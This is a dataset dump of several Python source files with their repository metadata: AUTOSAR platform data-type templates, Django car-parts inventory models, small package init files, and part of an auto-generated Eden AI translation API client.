def ref(cls): return AUTOSAR_Platform.ImplementationDataTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform.BaseTypes.sint8)
package = ws.find(AUTOSAR_Platform.ImplementationDataTypes.ref())
if package.find(cls.__name__) is None:
ws.pushRoles()
ws.setRoles(('/AUTOSAR_Platform/CompuMethods', 'CompuMethod'), ('/AUTOSAR_Platform/DataConstrs', 'DataConstraint'))
package.createImplementationDataType(cls.__name__, AUTOSAR_Platform.BaseTypes.sint8.ref(), lowerLimit=-128, upperLimit=127, typeEmitter='Platform_Type')
ws.popRoles()
class sint16(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.ImplementationDataTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform.BaseTypes.sint16)
package = ws.find(AUTOSAR_Platform.ImplementationDataTypes.ref())
if package.find(cls.__name__) is None:
ws.pushRoles()
ws.setRoles(('/AUTOSAR_Platform/CompuMethods', 'CompuMethod'), ('/AUTOSAR_Platform/DataConstrs', 'DataConstraint'))
package.createImplementationDataType(cls.__name__, AUTOSAR_Platform.BaseTypes.sint16.ref(), lowerLimit=-32768, upperLimit=32767, typeEmitter='Platform_Type')
ws.popRoles()
class sint32(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.ImplementationDataTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform.BaseTypes.sint32)
package = ws.find(AUTOSAR_Platform.ImplementationDataTypes.ref())
if package.find(cls.__name__) is None:
ws.pushRoles()
ws.setRoles(('/AUTOSAR_Platform/CompuMethods', 'CompuMethod'), ('/AUTOSAR_Platform/DataConstrs', 'DataConstraint'))
package.createImplementationDataType(cls.__name__, AUTOSAR_Platform.BaseTypes.sint32.ref(), lowerLimit=-2147483648, upperLimit=2147483647, typeEmitter='Platform_Type')
ws.popRoles()
class sint64(autosar.Template):
    """Template for the AUTOSAR Platform sint64 implementation data type."""

    @classmethod
    def ref(cls):
        # Reference path of this type inside the ImplementationDataTypes package.
        return '%s/%s' % (AUTOSAR_Platform.ImplementationDataTypes.ref(), cls.__name__)

    @classmethod
    def apply(cls, ws):
        # Ensure the underlying platform base type exists first.
        ws.apply(AUTOSAR_Platform.BaseTypes.sint64)
        pkg = ws.find(AUTOSAR_Platform.ImplementationDataTypes.ref())
        if pkg.find(cls.__name__) is not None:
            return  # already created
        ws.pushRoles()
        ws.setRoles(
            ('/AUTOSAR_Platform/CompuMethods', 'CompuMethod'),
            ('/AUTOSAR_Platform/DataConstrs', 'DataConstraint'),
        )
        pkg.createImplementationDataType(
            cls.__name__,
            AUTOSAR_Platform.BaseTypes.sint64.ref(),
            lowerLimit=-9223372036854775808,
            upperLimit=9223372036854775807,
            typeEmitter='Platform_Type',
        )
        ws.popRoles()
class uint8(autosar.Template):
    """Template for the AUTOSAR Platform uint8 implementation data type."""

    @classmethod
    def ref(cls):
        # Reference path of this type inside the ImplementationDataTypes package.
        return '%s/%s' % (AUTOSAR_Platform.ImplementationDataTypes.ref(), cls.__name__)

    @classmethod
    def apply(cls, ws):
        # Ensure the underlying platform base type exists first.
        ws.apply(AUTOSAR_Platform.BaseTypes.uint8)
        pkg = ws.find(AUTOSAR_Platform.ImplementationDataTypes.ref())
        if pkg.find(cls.__name__) is not None:
            return  # already created
        ws.pushRoles()
        ws.setRoles(
            ('/AUTOSAR_Platform/CompuMethods', 'CompuMethod'),
            ('/AUTOSAR_Platform/DataConstrs', 'DataConstraint'),
        )
        pkg.createImplementationDataType(
            cls.__name__,
            AUTOSAR_Platform.BaseTypes.uint8.ref(),
            lowerLimit=0,
            upperLimit=255,
            typeEmitter='Platform_Type',
        )
        ws.popRoles()
class uint16(autosar.Template):
    """Template for the AUTOSAR Platform uint16 implementation data type."""

    @classmethod
    def ref(cls):
        # Reference path of this type inside the ImplementationDataTypes package.
        return '%s/%s' % (AUTOSAR_Platform.ImplementationDataTypes.ref(), cls.__name__)

    @classmethod
    def apply(cls, ws):
        # Ensure the underlying platform base type exists first.
        ws.apply(AUTOSAR_Platform.BaseTypes.uint16)
        pkg = ws.find(AUTOSAR_Platform.ImplementationDataTypes.ref())
        if pkg.find(cls.__name__) is not None:
            return  # already created
        ws.pushRoles()
        ws.setRoles(
            ('/AUTOSAR_Platform/CompuMethods', 'CompuMethod'),
            ('/AUTOSAR_Platform/DataConstrs', 'DataConstraint'),
        )
        pkg.createImplementationDataType(
            cls.__name__,
            AUTOSAR_Platform.BaseTypes.uint16.ref(),
            lowerLimit=0,
            upperLimit=65535,
            typeEmitter='Platform_Type',
        )
        ws.popRoles()
class uint32(autosar.Template):
    """Template for the AUTOSAR Platform uint32 implementation data type."""

    @classmethod
    def ref(cls):
        # Reference path of this type inside the ImplementationDataTypes package.
        return '%s/%s' % (AUTOSAR_Platform.ImplementationDataTypes.ref(), cls.__name__)

    @classmethod
    def apply(cls, ws):
        # Ensure the underlying platform base type exists first.
        ws.apply(AUTOSAR_Platform.BaseTypes.uint32)
        pkg = ws.find(AUTOSAR_Platform.ImplementationDataTypes.ref())
        if pkg.find(cls.__name__) is not None:
            return  # already created
        ws.pushRoles()
        ws.setRoles(
            ('/AUTOSAR_Platform/CompuMethods', 'CompuMethod'),
            ('/AUTOSAR_Platform/DataConstrs', 'DataConstraint'),
        )
        pkg.createImplementationDataType(
            cls.__name__,
            AUTOSAR_Platform.BaseTypes.uint32.ref(),
            lowerLimit=0,
            upperLimit=4294967295,
            typeEmitter='Platform_Type',
        )
        ws.popRoles()
class uint64(autosar.Template):
    """Template for the AUTOSAR Platform uint64 implementation data type."""

    @classmethod
    def ref(cls):
        # Reference path of this type inside the ImplementationDataTypes package.
        return '%s/%s' % (AUTOSAR_Platform.ImplementationDataTypes.ref(), cls.__name__)

    @classmethod
    def apply(cls, ws):
        # Ensure the underlying platform base type exists first.
        ws.apply(AUTOSAR_Platform.BaseTypes.uint64)
        pkg = ws.find(AUTOSAR_Platform.ImplementationDataTypes.ref())
        if pkg.find(cls.__name__) is not None:
            return  # already created
        ws.pushRoles()
        ws.setRoles(
            ('/AUTOSAR_Platform/CompuMethods', 'CompuMethod'),
            ('/AUTOSAR_Platform/DataConstrs', 'DataConstraint'),
        )
        pkg.createImplementationDataType(
            cls.__name__,
            AUTOSAR_Platform.BaseTypes.uint64.ref(),
            lowerLimit=0,
            upperLimit=18446744073709551615,
            typeEmitter='Platform_Type',
        )
        ws.popRoles()
if __name__ == '__main__':
    # Build a fresh AUTOSAR 4.2.2 workspace, instantiate every platform
    # template, and export the result as a DCF file set.
    workspace = autosar.workspace("4.2.2")
    workspace.apply(AUTOSAR_Platform.all)
    dcf_config = {
        'AUTOSAR_Platform': {'root': 'DATATYPE', 'filters': ['/AUTOSAR_Platform']},
    }
    dcf = autosar.util.createDcf(workspace)
    dcf.save('autosar4', 'Platform', dcf_config, force=True)
| 48.295844
| 224
| 0.617375
| 1,815
| 19,753
| 6.416529
| 0.058402
| 0.195775
| 0.12983
| 0.105787
| 0.900223
| 0.884252
| 0.803881
| 0.793835
| 0.779753
| 0.779753
| 0
| 0.018872
| 0.278388
| 19,753
| 408
| 225
| 48.414216
| 0.798162
| 0.04531
| 0
| 0.765273
| 0
| 0
| 0.076702
| 0.039335
| 0
| 0
| 0
| 0
| 0
| 1
| 0.18328
| false
| 0
| 0.003215
| 0.093248
| 0.282958
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3357b6239d616ac5d16830dadf9568ee59c7e9ca
| 7,966
|
py
|
Python
|
inventories/models.py
|
maziokey/mechanic
|
140079101125ece44d107bd826ee70da5ac46041
|
[
"MIT"
] | 1
|
2020-08-29T18:35:24.000Z
|
2020-08-29T18:35:24.000Z
|
inventories/models.py
|
maziokey/mechanic
|
140079101125ece44d107bd826ee70da5ac46041
|
[
"MIT"
] | null | null | null |
inventories/models.py
|
maziokey/mechanic
|
140079101125ece44d107bd826ee70da5ac46041
|
[
"MIT"
] | null | null | null |
import uuid
import datetime
from django.core.validators import MaxValueValidator, MinValueValidator
from django.db import models
from django.urls import reverse
from django.utils.text import slugify
# Create your models here.
def current_year():
    """Return the current calendar year (local time) as an int."""
    today = datetime.date.today()
    return today.year
def max_value_current_year(value):
    """Django validator: reject ``value`` if it exceeds the current year.

    Wrapping MaxValueValidator in a function keeps the bound fresh on every
    validation instead of freezing it at migration time.
    """
    validator = MaxValueValidator(current_year())
    return validator(value)
class Make(models.Model):
    """A car manufacturer (e.g. Toyota)."""
    id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    name = models.CharField(max_length=40)
    slug = models.SlugField(default='', editable=False, max_length=200, null=False)

    def __str__(self):
        return self.name

    def get_absolute_url(self):
        # Detail URLs are resolved from both the primary key and the slug.
        return reverse('make_detail', kwargs={'pk': self.id, 'slug': self.slug})

    def save(self, *args, **kwargs):
        # Re-derive the slug from the current name on every save.
        self.slug = slugify(self.name, allow_unicode=True)
        super().save(*args, **kwargs)
class Car_Model(models.Model):
    """A model line belonging to a manufacturer (e.g. 'Corolla')."""
    id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    make = models.ForeignKey(Make, related_name='carmodels', on_delete=models.CASCADE)
    name = models.CharField(max_length=40)
    slug = models.SlugField(default='', editable=False, max_length=200, null=False)

    def __str__(self):
        return self.name

    def get_absolute_url(self):
        # Detail URLs are resolved from both the primary key and the slug.
        return reverse('car_model_detail', kwargs={'pk': self.id, 'slug': self.slug})

    def save(self, *args, **kwargs):
        # Re-derive the slug from the current name on every save.
        self.slug = slugify(self.name, allow_unicode=True)
        super().save(*args, **kwargs)
class Model_Year(models.Model):
    """A production year of a specific car model."""
    id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    make = models.ForeignKey(Make, related_name='carmodelyears', on_delete=models.CASCADE)
    car_model = models.ForeignKey(Car_Model, related_name='modelyears', on_delete=models.CASCADE)
    # BUGFIX: pass the callable itself, not current_year(). With the call,
    # the default was evaluated once at import/migration time and frozen at
    # that year forever; Django invokes a callable default per-row instead.
    prod_year = models.PositiveIntegerField(
        default=current_year,
        validators=[MinValueValidator(1984), max_value_current_year])
    slug = models.SlugField(default='', editable=False, max_length=200, null=False)

    def __str__(self):
        return str(self.prod_year)

    def get_absolute_url(self):
        # Detail URLs are resolved from both the primary key and the slug.
        return reverse('model_year_detail', kwargs={'pk': self.id, 'slug': self.slug})

    def save(self, *args, **kwargs):
        # slugify() str()-coerces its argument, so passing the int year is fine.
        self.slug = slugify(self.prod_year, allow_unicode=True)
        super().save(*args, **kwargs)
class Engine(models.Model):
    """An engine variant available for a given make/model/year."""
    id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    make = models.ForeignKey(Make, related_name='carengines', on_delete=models.CASCADE)
    car_model = models.ForeignKey(Car_Model, related_name='carmodelengines', on_delete=models.CASCADE)
    model_year = models.ForeignKey(Model_Year, related_name='engines', on_delete=models.CASCADE)
    name = models.CharField(max_length=40)
    slug = models.SlugField(default='', editable=False, max_length=200, null=False)

    def __str__(self):
        return self.name

    def get_absolute_url(self):
        # Detail URLs are resolved from both the primary key and the slug.
        return reverse('engine_detail', kwargs={'pk': self.id, 'slug': self.slug})

    def save(self, *args, **kwargs):
        # Re-derive the slug from the current name on every save.
        self.slug = slugify(self.name, allow_unicode=True)
        super().save(*args, **kwargs)
class Fuel(models.Model):
    """A fuel type available for a given make/model/year/engine combination."""
    id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    make = models.ForeignKey(Make, related_name='carfuels', on_delete=models.CASCADE)
    car_model = models.ForeignKey(Car_Model, related_name='carmodelfuels', on_delete=models.CASCADE)
    model_year = models.ForeignKey(Model_Year, related_name='yearfuels', on_delete=models.CASCADE)
    engine = models.ForeignKey(Engine, related_name='fuels', on_delete=models.CASCADE)
    name = models.CharField(max_length=40)
    slug = models.SlugField(default='', editable=False, max_length=200, null=False)

    def __str__(self):
        return self.name

    def get_absolute_url(self):
        # Detail URLs are resolved from both the primary key and the slug.
        return reverse('fuel_detail', kwargs={'pk': self.id, 'slug': self.slug})

    def save(self, *args, **kwargs):
        # Re-derive the slug from the current name on every save.
        self.slug = slugify(self.name, allow_unicode=True)
        super().save(*args, **kwargs)
class Component(models.Model):
    """A vehicle component category scoped by make/model/year/engine/fuel."""
    id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    make = models.ForeignKey(Make, related_name='carcomponents', on_delete=models.CASCADE)
    car_model = models.ForeignKey(Car_Model, related_name='carmodelcomponents', on_delete=models.CASCADE)
    model_year = models.ForeignKey(Model_Year, related_name='yearcomponents', on_delete=models.CASCADE)
    engine = models.ForeignKey(Engine, related_name='enginecomponents', on_delete=models.CASCADE)
    fuel = models.ForeignKey(Fuel, related_name='fuelcomponents', on_delete=models.CASCADE)
    name = models.CharField(max_length=40)
    slug = models.SlugField(default='', editable=False, max_length=200, null=False)

    def __str__(self):
        return self.name

    def get_absolute_url(self):
        # Detail URLs are resolved from both the primary key and the slug.
        return reverse('component_detail', kwargs={'pk': self.id, 'slug': self.slug})

    def save(self, *args, **kwargs):
        # Re-derive the slug from the current name on every save.
        self.slug = slugify(self.name, allow_unicode=True)
        super().save(*args, **kwargs)
class Part(models.Model):
    """A sellable spare part, fully scoped down to the component it fits."""
    id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    make = models.ForeignKey(Make, related_name='makeparts', on_delete=models.CASCADE)
    car_model = models.ForeignKey(Car_Model, related_name='carmodelparts', on_delete=models.CASCADE)
    model_year = models.ForeignKey(Model_Year, related_name='yearparts', on_delete=models.CASCADE)
    engine = models.ForeignKey(Engine, related_name='engineparts', on_delete=models.CASCADE)
    fuel = models.ForeignKey(Fuel, related_name='fuelparts', on_delete=models.CASCADE)
    component = models.ForeignKey(Component, related_name='componentparts', on_delete=models.CASCADE)
    name = models.CharField(max_length=40, db_index=True)
    description = models.TextField(blank=True)
    specification = models.TextField(blank=True)
    stock = models.BooleanField(default=True)
    price = models.DecimalField(max_digits=10, decimal_places=2)
    image = models.ImageField(upload_to='pics/', blank=True)
    slug = models.SlugField(default='', editable=False, max_length=200, null=False)

    def __str__(self):
        return self.name

    def get_absolute_url(self):
        # Detail URLs are resolved from both the primary key and the slug.
        return reverse('part_detail', kwargs={'pk': self.id, 'slug': self.slug})

    def save(self, *args, **kwargs):
        # Re-derive the slug from the current name on every save.
        self.slug = slugify(self.name, allow_unicode=True)
        super().save(*args, **kwargs)
# NOTE(review): dead code — an earlier flat `Car` model, kept only as a
# module-level string (it is never executed). Consider deleting it; version
# control preserves the history.
'''
class Car(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
name = models.CharField(max_length=30, db_index=True)
model = models.CharField(max_length=30)
year = models.PositiveIntegerField(default=current_year(), validators=[MinValueValidator(1984), max_value_current_year])
engine = models.CharField(max_length=20)
fuel = models.CharField(max_length=20)
slug = models.SlugField(default='', editable=False, max_length=200, null=False)
def __str__(self):
return self.name
def get_absolute_url(self):
kwargs = {
'pk': self.id,
'slug': self.slug
}
return reverse('car_detail', kwargs=kwargs)
def save(self, *args, **kwargs):
value = self.name
self.slug = slugify(value, allow_unicode=True)
super().save(*args, **kwargs)
'''
| 38.483092
| 129
| 0.681898
| 983
| 7,966
| 5.347915
| 0.116989
| 0.063915
| 0.055925
| 0.083888
| 0.815294
| 0.800076
| 0.800076
| 0.800076
| 0.800076
| 0.800076
| 0
| 0.009802
| 0.193196
| 7,966
| 207
| 130
| 38.483092
| 0.808153
| 0.003013
| 0
| 0.587838
| 0
| 0
| 0.054027
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.155405
| false
| 0
| 0.040541
| 0.060811
| 0.668919
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
cc046cb8a29b3347d94897779b1c5bbd9afe9506
| 68
|
py
|
Python
|
book_flight/__init__.py
|
hoou/book-flight
|
8ddf30c62e59af8219d02837fb1a21229fb0f908
|
[
"MIT"
] | null | null | null |
book_flight/__init__.py
|
hoou/book-flight
|
8ddf30c62e59af8219d02837fb1a21229fb0f908
|
[
"MIT"
] | null | null | null |
book_flight/__init__.py
|
hoou/book-flight
|
8ddf30c62e59af8219d02837fb1a21229fb0f908
|
[
"MIT"
] | null | null | null |
import book_flight.book_flight


def main():
    """Console entry point: delegate to the ``book_flight.book_flight`` submodule.

    BUGFIX: inside this package ``__init__``, the name ``book_flight`` is the
    package itself, so the original ``book_flight.main()`` resolved back to
    this very function and recursed until RecursionError. Call the submodule's
    ``main`` explicitly instead.
    """
    book_flight.book_flight.main()
| 11.333333
| 30
| 0.735294
| 10
| 68
| 4.7
| 0.5
| 0.638298
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.161765
| 68
| 5
| 31
| 13.6
| 0.824561
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cc078976458933168eb04d7a4a8d5794afbbcb55
| 157
|
py
|
Python
|
tests/unit_tests/test_utils/__init__.py
|
yardencsGitHub/vak
|
04da97b02ded5acccab437c2538d0a1ded3bef80
|
[
"BSD-3-Clause"
] | 1
|
2021-04-27T01:22:38.000Z
|
2021-04-27T01:22:38.000Z
|
tests/unit_tests/test_utils/__init__.py
|
yardencsGitHub/vak
|
04da97b02ded5acccab437c2538d0a1ded3bef80
|
[
"BSD-3-Clause"
] | null | null | null |
tests/unit_tests/test_utils/__init__.py
|
yardencsGitHub/vak
|
04da97b02ded5acccab437c2538d0a1ded3bef80
|
[
"BSD-3-Clause"
] | null | null | null |
from . import test_bruteforce
from . import test_data
from . import test_general
from . import test_labels
from . import test_split
from . import test_utils
| 22.428571
| 29
| 0.808917
| 24
| 157
| 5.041667
| 0.375
| 0.495868
| 0.694215
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152866
| 157
| 6
| 30
| 26.166667
| 0.909774
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cc0903f8fb1a47c4e34a919e3347ef447c340a2b
| 23,769
|
py
|
Python
|
edenai/api/translation_api.py
|
SamyMe/edenai-python
|
b92ca21086c90a0c31cd68ba92fff897811752d2
|
[
"Apache-2.0"
] | 20
|
2021-08-11T09:37:42.000Z
|
2022-01-14T08:05:49.000Z
|
edenai/api/translation_api.py
|
SamyMe/edenai-python
|
b92ca21086c90a0c31cd68ba92fff897811752d2
|
[
"Apache-2.0"
] | 2
|
2021-08-11T09:36:21.000Z
|
2022-03-13T13:49:53.000Z
|
edenai/api/translation_api.py
|
SamyMe/edenai-python
|
b92ca21086c90a0c31cd68ba92fff897811752d2
|
[
"Apache-2.0"
] | 7
|
2021-08-06T10:08:59.000Z
|
2022-01-29T22:10:45.000Z
|
# coding: utf-8
"""
Eden AI API Documentation
<a href=\"https://app.edenai.run/user/login\" target=\"_blank\"><img src=\"/static/images/welcome.png\"></a>. # Welcome Eden AI simplifies the use and integration of AI technologies by providing a unique API connected to the best AI engines and combined with a powerful management platform. The platform covers a wide range of AI technologies: * Vision: <a href=\"https://www.edenai.co/vision\" target=\"_blank\">www.edenai.co/vision</a>. * Text & NLP: <a href=\"https://www.edenai.co/text\" target=\"_blank\">www.edenai.co/text</a>. * Speech & Audio: <a href=\"https://www.edenai.co/speech\" target=\"_blank\">www.edenai.co/speech</a>. * OCR: <a href=\"https://www.edenai.co/ocr\" target=\"_blank\">www.edenai.co/ocr</a>. * Machine Translation: <a href=\"https://www.edenai.co/translation\" target=\"_blank\">www.edenai.co/translation</a>. * Prediction: <a href=\"https://www.edenai.co/prediction\" target=\"_blank\">www.edenai.co/prediction</a>. For all the proposed technologies, we provide a single endpoint: the service provider is only a parameter that can be changed very easily. All the engines available on Eden AI are listed here: www.edenai.co/catalog # Support & community ### 1- Support If you have any problems, please contact us at this email address: contact@edenai.co. We will be happy to help you in the use of Eden AI. ### 2- Community You can interact personally with other people actively using and working with Eden AI and join our <a href=\"https://join.slack.com/t/edenai/shared_invite/zt-t68c2pr9-4lDKQ_qEqmLiWNptQzB_6w\" target=\"_blank\">Slack community</a>. We are always updating our docs, so a good way to always stay up to date is to watch our documentation repo on Github: <a href=\"https://github.com/edenai\" target=\"_blank\">https://github.com/edenai</a>. ### 3- Blog We also regularly publish various articles with Eden AI news and technical articles on the different AI engines that exist. 
You can find these articles here: <a href=\"https://www.edenai.co/blog\" target=\"_blank\">https://www.edenai.co/blog</a>. # Authentication ## Create account  To create an account, please go to this link: <a href=\"https://app.edenai.run/user/login\" target=\"_blank\">app.edenai.run/user/login</a>. You can create an account with your email address or by using your account on available platforms (Gmail, Github, etc.). By creating an account with your email address, you will receive a confirmation email with a link to click. Check your spam if needed and contact us if you have any problem: contact@edenai.co  ## API key By going to your account page on the platform: <a href=\"https://app.edenai.run/admin/account\" target=\"_blank\">https://app.edenai.run/admin/account</a>, you will have access to your API key to start using the different AI engines offered by Eden AI.  # Portal Guide Eden AI provides a web portal that allows you to do several tasks:  ### 1- Benchmark and test The platform allows you to easily compare competing engines without having to code. By uploading your data, you have access to the prediction results of the different engines. This gives you a first overview of the performance of AI engines.  ### 2- Cost management The <a href=\"https://app.edenai.run/admin/cost-management\" target=\"_blank\">cost management page</a> also allows you to centralize the costs associated with the different engines with various filters to simplify the analysis. This page also allows you to define monthly budget limits not to be exceeded to secure the use of different AI engines.  ### 3- Account The <a href=\"https://app.edenai.run/admin/account\" target=\"_blank\">account page</a> allows you to change your information and password. It also gives you access to your API key that you can renew if needed. This page also allows you to add a credit card and to buy with credits to use all the engines offered by Eden AI.  
# API Guide Eden AI API has different endpoints that refer to different AI services. The connected providers are thus parameters that the user can easily change. # noqa: E501
OpenAPI spec version: v1
Contact: contact@edenai.co
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from edenai.api_client import ApiClient
class TranslationApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def automatic_translation(self, text, source_language, target_language, providers, **kwargs): # noqa: E501
"""automatic_translation # noqa: E501
Machine translation refers to the translation of a text into another language using rules, statics or ml technics. **SUPPORTED LANGUAGE** |Name|Type|Value| |----|----|-----| |**Afrikaans**|`string`|`af-AF`| |**Albanian**|`string`|`sq-SQ`| |**Amharic**|`string`|`am-AM`| |**Arabic**|`string`|`ar-XA`| |**Armenian**|`string`|`hy-HY`| |**Azerbaijani**|`string`|`az-AZ`| |**Basque**|`string`|`eu-BA`| |**Belarusian**|`string`|`be-BE`| |**Bengali**|`string`|`bn-BN`| |**Bosnian**|`string`|`bs-BS`| |**Bulgarian**|`string`|`bg-BG`| |**Catalan**|`string`|`ca-ES`| |**Cebuano**|`string`|`ceb-CB`| |**Chinese-Simplified**|`string`|`zh-CN`| |**Chinese-Traditional**|`string`|`zh-TW`| |**Corsican**|`string`|`co-CO`| |**Croatian**|`string`|`hr-HR`| |**Czech**|`string`|`cz-CZ`| |**Danish**|`string`|`da-DK`| |**Dutch**|`string`|`nl-NL`| |**English**|`string`|`en-US`| |**Esperanto**|`string`|`eo-EO`| |**Estonian**|`string`|`et-ET`| |**Finnish**|`string`|`fn-FN`| |**French**|`string`|`fr-FR`| |**French-Canadian**|`string`|`fr-CA`| |**Frisian**|`string`|`fy-FY`| |**Galician**|`string`|`gl-GL`| |**Georgian**|`string`|`ka-KA`| |**German**|`string`|`de-DE`| |**Greek**|`string`|`gr-GR`| |**Gujarati**|`string`|`gu-GU`| |**Haitian-Creole**|`string`|`ht-HT`| |**Hausa**|`string`|`ha-HA`| |**Hawaiian**|`string`|`haw-HA`| |**Hebrew**|`string`|`he-HE`| |**Hindi**|`string`|`hi-HI`| |**Hmong**|`string`|`hmn_HM`| |**Hungarian**|`string`|`hu-HU`| |**Icelandic**|`string`|`is-IS`| |**Igbo**|`string`|`ig-IG`| |**Indonesian**|`string`|`id-ID`| |**Irish**|`string`|`ga-IR`| |**Italian**|`string`|`it-IT`| |**Japanese**|`string`|`ja-JP`| |**Javanese**|`string`|`jv-JV`| |**Kannada**|`string`|`kn-KN`| |**Kazakh**|`string`|`kk-KK`| |**Khmer**|`string`|`km-KM`| |**Korean**|`string`|`ko-KR`| |**Kurdish**|`string`|`ku-KU`| |**Kyrgyz**|`string`|`ky-KY`| |**Lao**|`string`|`lo-LO`| |**Latin**|`string`|`la-LA`| |**Latvian**|`string`|`lv-LV`| |**Lithuanian**|`string`|`lt-LT`| |**Luxembourgish**|`string`|`lb-LB`| 
|**Macedonian**|`string`|`mk-MK`| |**Malagasy**|`string`|`mg-MG`| |**Malay**|`string`|`ms-MY`| |**Malayalam**|`string`|`ml-ML`| |**Maltese**|`string`|`mt-MT`| |**Maori**|`string`|`mi-MI`| |**Marathi**|`string`|`mr-MR`| |**Mongolian**|`string`|`mn-MN`| |**Myanmar-Burmese**|`string`|`my-MY`| |**Nepali**|`string`|`ne-NE`| |**Norwegian**|`string`|`no-NO`| |**Nyanja Chichewa**|`string`|`ny-NY`| |**Pashto**|`string`|`ps-PS`| |**Persian**|`string`|`fa-FA`| |**Polish**|`string`|`pl-PO`| |**Portuguese**|`string`|`pt-PT`| |**Punjabi**|`string`|`pa-PA`| |**Romanian**|`string`|`ro-RO`| |**Russian**|`string`|`ru-RU`| |**Samoan**|`string`|`sm-SM`| |**Scots Gaelic**|`string`|`gd-GD`| |**Serbian**|`string`|`sr-SR`| |**Sesotho**|`string`|`st-ST`| |**Shona**|`string`|`sn-SN`| |**Sindhi**|`string`|`sd-SD`| |**Sinhala-Sinhalese**|`string`|`si-SI`| |**Slovak**|`string`|`sk-SK`| |**Slovenian**|`string`|`sl-SL`| |**Somali**|`string`|`so-SO`| |**Spanish**|`string`|`es-ES`| |**Sundanese**|`string`|`su-SU`| |**Swahili**|`string`|`sh-SH`| |**Swedish**|`string`|`sw-SW`| |**Tagalog-Filipino**|`string`|`tl-TL`| |**Tajik**|`string`|`tg-TG`| |**Tamil**|`string`|`ta-TA`| |**Telugu**|`string`|`te-TE`| |**Thai**|`string`|`th-TH`| |**Turkish**|`string`|`tr-TR`| |**Ukrainian**|`string`|`uk-UK`| |**Urdu**|`string`|`ur-UR`| |**Uzbek**|`string`|`uz-UZ`| |**Vietnamese**|`string`|`vi-VI`| |**Welsh**|`string`|`cy-CY`| |**Xhosa**|`string`|`xh-XH`| |**Yiddish**|`string`|`yi-YI`| |**Yoruba**|`string`|`yo-YO`| **AVAILABLE PROVIDERS** |Name|Value|Version| |----|-----|-------| |[**Microsoft Azure**](https://www.edenai.co/catalog/azure-translator)|`microsoft`|`v3.0`| |[**Amazon Web Services**](https://www.edenai.co/catalog/amazon-translate)|`amazon`|`boto3 (v1.15.18)`| |[**Google Cloud**](https://www.edenai.co/catalog/google-cloud-translation)|`google`|`v3`| # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.automatic_translation(text, source_language, target_language, providers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str text: (required)
:param str source_language: (required)
:param str target_language: (required)
:param str providers: (required)
:return: InlineResponse2007
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.automatic_translation_with_http_info(text, source_language, target_language, providers, **kwargs) # noqa: E501
else:
(data) = self.automatic_translation_with_http_info(text, source_language, target_language, providers, **kwargs) # noqa: E501
return data
    def automatic_translation_with_http_info(self, text, source_language, target_language, providers, **kwargs):  # noqa: E501
        """automatic_translation  # noqa: E501

        Low-level variant of ``automatic_translation``: validates parameters
        and POSTs to ``/pretrained/translation/automatic_translation``.
        Provider identifiers (``google``, ``amazon``, ``microsoft``) and the
        supported language codes are listed in the Eden AI catalog.

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.automatic_translation_with_http_info(text, source_language, target_language, providers, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str text: (required)
        :param str source_language: (required)
        :param str target_language: (required)
        :param str providers: (required)
        :return: InlineResponse2007
                 If the method is called asynchronously,
                 returns the request thread.
        """
